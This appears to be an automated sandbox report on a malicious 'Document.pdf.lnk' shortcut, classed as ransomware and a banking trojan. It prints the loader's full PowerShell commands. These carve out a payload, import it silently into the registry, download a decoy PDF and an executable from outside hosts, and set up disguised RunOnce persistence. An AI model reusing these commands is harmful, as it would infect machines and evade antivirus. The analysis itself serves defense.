Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: classification engineClassification label: mal100.rans.bank.troj.evad.winLNK@27/66@1/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\17399.regJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5260:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5144:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1188:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l1fxr12h.dn1.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: Document.pdf.lnkVirustotal: Detection: 40%
Source: Document.pdf.lnkReversingLabs: Detection: 34%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "& {$currentPath = (Get-Location).Path; Start-Process powershell -WindowStyle Hidden -Verb RunAs -ArgumentList ('-Command Set-Location -Path ''\"' + $currentPath + '\"'' ;$dirPath = Get-Location;Set-Location -Path ''\"' + $dirPath.Path + '\"'' ;$lnkpaths = Get-ChildItem -Path ''\"' + $dirPath.Path + '\"'' -Recurse *.lnk | Where-Object { $_.length -eq 423781 } | Select-Object -ExpandProperty FullName;$lnkpath = if ($lnkpaths -is [array]) {$lnkpaths[0]} else {$lnkpaths};$exeFile = Get-Content $lnkpath -Encoding Byte -TotalCount 423781 -ReadCount 423781;$exePath = Join-Path $env:public ''17399.reg'';Set-Content $exePath ([byte[]]($exeFile | Select-Object -Skip 4901)) -Encoding Byte;Start-Process -FilePath ''regedit'' -ArgumentList ''/s'', $exePath;$a=''http://files.catbox.moe/p1yr9i.pdf'';$d=$env:TEMP + ''\Document.pdf'';Invoke-WebRequest -Uri $a -OutFile $d; Invoke-Item $d')}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-Location -Path '"C:\Users\user\Desktop"' ;$dirPath = Get-Location;Set-Location -Path '""' ;$lnkpaths = Get-ChildItem -Path '""' -Recurse *.lnk | Where-Object { $_.length -eq 423781 } | Select-Object -ExpandProperty FullName;$lnkpath = if ($lnkpaths -is [array]) {$lnkpaths[0]} else {$lnkpaths};$exeFile = Get-Content $lnkpath -Encoding Byte -TotalCount 423781 -ReadCount 423781;$exePath = Join-Path $env:public '17399.reg';Set-Content $exePath ([byte[]]($exeFile | Select-Object -Skip 4901)) -Encoding Byte;Start-Process -FilePath 'regedit' -ArgumentList '/s', $exePath;$a='http://files.catbox.moe/p1yr9i.pdf';$d=$env:TEMP + '\Document.pdf';Invoke-WebRequest -Uri $a -OutFile $d; Invoke-Item $d
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\regedit.exe "C:\Windows\regedit.exe" /s C:\Users\Public\17399.reg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\Document.pdf
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1720,i,67177622323241092,908084778299603848,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -e JABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIAAoAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuACAAfAAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAtAFEAdQBhAGwAaQBmAGkAZQByACkAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -e JABhAD0AJwBoAHQAdABwADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBNAHkAUAByAGkAbgBjAGUAcwBzAEEAawBpAHIAYQAvAEoAYQByAHYAYQBzAC8AbQBhAGkAbgAvAEEAbABlAGoALgBlAHgAZQAnADsAJABkAD0AIgAkACgAJABlAG4AdgA6AFQARQB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-Location -Path '"C:\Users\user\Desktop"' ;$dirPath = Get-Location;Set-Location -Path '""' ;$lnkpaths = Get-ChildItem -Path '""' -Recurse *.lnk | Where-Object { $_.length -eq 423781 } | Select-Object -ExpandProperty FullName;$lnkpath = if ($lnkpaths -is [array]) {$lnkpaths[0]} else {$lnkpaths};$exeFile = Get-Content $lnkpath -Encoding Byte -TotalCount 423781 -ReadCount 423781;$exePath = Join-Path $env:public '17399.reg';Set-Content $exePath ([byte[]]($exeFile | Select-Object -Skip 4901)) -Encoding Byte;Start-Process -FilePath 'regedit' -ArgumentList '/s', $exePath;$a='http://files.catbox.moe/p1yr9i.pdf';$d=$env:TEMP + '\Document.pdf';Invoke-WebRequest -Uri $a -OutFile $d; Invoke-Item $d Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\regedit.exe "C:\Windows\regedit.exe" /s C:\Users\Public\17399.reg Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\Document.pdfJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1720,i,67177622323241092,908084778299603848,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: Document.pdf.lnkLNK file: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation

barindex
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "& {$currentPath = (Get-Location).Path; Start-Process powershell -WindowStyle Hidden -Verb RunAs -ArgumentList ('-Command Set-Location -Path ''\"' + $currentPath + '\"'' ;$dirPath = Get-Location;Set-Location -Path ''\"' + $dirPath.Path + '\"'' ;$lnkpaths = Get-ChildItem -Path ''\"' + $dirPath.Path + '\"'' -Recurse *.lnk | Where-Object { $_.length -eq 423781 } | Select-Object -ExpandProperty FullName;$lnkpath = if ($lnkpaths -is [array]) {$lnkpaths[0]} else {$lnkpaths};$exeFile = Get-Content $lnkpath -Encoding Byte -TotalCount 423781 -ReadCount 423781;$exePath = Join-Path $env:public ''17399.reg'';Set-Content $exePath ([byte[]]($exeFile | Select-Object -Skip 4901)) -Encoding Byte;Start-Process -FilePath ''regedit'' -ArgumentList ''/s'', $exePath;$a=''http://files.catbox.moe/p1yr9i.pdf'';$d=$env:TEMP + ''\Document.pdf'';Invoke-WebRequest -Uri $a -OutFile $d; Invoke-Item $d')}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-Location -Path '"C:\Users\user\Desktop"' ;$dirPath = Get-Location;Set-Location -Path '""' ;$lnkpaths = Get-ChildItem -Path '""' -Recurse *.lnk | Where-Object { $_.length -eq 423781 } | Select-Object -ExpandProperty FullName;$lnkpath = if ($lnkpaths -is [array]) {$lnkpaths[0]} else {$lnkpaths};$exeFile = Get-Content $lnkpath -Encoding Byte -TotalCount 423781 -ReadCount 423781;$exePath = Join-Path $env:public '17399.reg';Set-Content $exePath ([byte[]]($exeFile | Select-Object -Skip 4901)) -Encoding Byte;Start-Process -FilePath 'regedit' -ArgumentList '/s', $exePath;$a='http://files.catbox.moe/p1yr9i.pdf';$d=$env:TEMP + '\Document.pdf';Invoke-WebRequest -Uri $a -OutFile $d; Invoke-Item $d
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -e JABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIAAoAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuACAAfAAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAtAFEAdQBhAGwAaQBmAGkAZQByACkAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -e JABhAD0AJwBoAHQAdABwADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBNAHkAUAByAGkAbgBjAGUAcwBzAEEAawBpAHIAYQAvAEoAYQByAHYAYQBzAC8AbQBhAGkAbgAvAEEAbABlAGoALgBlAHgAZQAnADsAJABkAD0AIgAkACgAJABlAG4AdgA6AFQARQB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-Location -Path '"C:\Users\user\Desktop"' ;$dirPath = Get-Location;Set-Location -Path '""' ;$lnkpaths = Get-ChildItem -Path '""' -Recurse *.lnk | Where-Object { $_.length -eq 423781 } | Select-Object -ExpandProperty FullName;$lnkpath = if ($lnkpaths -is [array]) {$lnkpaths[0]} else {$lnkpaths};$exeFile = Get-Content $lnkpath -Encoding Byte -TotalCount 423781 -ReadCount 423781;$exePath = Join-Path $env:public '17399.reg';Set-Content $exePath ([byte[]]($exeFile | Select-Object -Skip 4901)) -Encoding Byte;Start-Process -FilePath 'regedit' -ArgumentList '/s', $exePath;$a='http://files.catbox.moe/p1yr9i.pdf';$d=$env:TEMP + '\Document.pdf';Invoke-WebRequest -Uri $a -OutFile $d; Invoke-Item $d Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B940952 push E95AE3D0h; ret 0_2_00007FFD9B9409C9

Persistence and Installation Behavior

barindex
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior

Boot Survival

barindex
Source: C:\Windows\regedit.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce BatteryDiagnosticHelperJump to behavior
Source: C:\Windows\regedit.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce BatteryDiagnosticHelper powershell -W Hidden -e JABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIAAoAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuACAAfAAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAtAFEAdQBhAGwAaQBmAGkAZQByACkAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlAFwAJump to behavior
